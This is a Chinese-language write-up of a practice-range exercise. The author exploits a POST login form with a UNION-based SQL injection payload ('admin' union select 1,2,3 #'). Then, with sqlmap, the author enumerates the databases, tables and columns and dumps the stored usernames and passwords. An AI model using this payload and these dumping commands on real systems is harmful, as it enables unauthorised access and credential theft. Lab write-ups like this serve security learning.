题记:今天本来打算在mozhe找个POST注入练练手工注入,结果直接爆出来了(汗颜),真实浪费了我的3个币(啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊,你还我!!!!!!!!)
所以本着买都买了的心,给大家看看sqlmap怎么跑的!
payload:
name=admin' union select 1,2,3 #&password=admin
一、实验准备
1.墨者靶场(POST注入)
2.sqlmap工具(主要)
3.burpsuite工具
(如果大家对工具有需求的话可以q我哈)
二、工具小子闪亮登场
1.查询注入点
第一种:使用数据包查询
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具相同目录,在需要测试参数后加*
payload:
Python sqlmap.py -r 1.txt
发现存在注入点,并且给出了我们具体执行的payload格式
第二种:使用POST格式url查询
同时--data参数后所跟数据也可以通过抓包获取
payload:
Python sqlmap.py -u “http://124.70.71.251:41800//login.php” --data “name=admin&password=admin”
2.顺风顺水之路之库名、表名、列名、字段值
(1)查询数据库名
对于第二种方法只需修改对应参数即可所以不在做重复演示
paylaod:python sqlmap.py -r 1.txt --dbs
(2)查询表名
paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" --tables
(3)查询列名
paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member" --columns
(4)查询字段值
paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member" -C "password,name" --dump --threads=10
注意:此处--threads=10表示线程数为10,最大值!!!
至此完毕!!!!
有任何疑问可以私信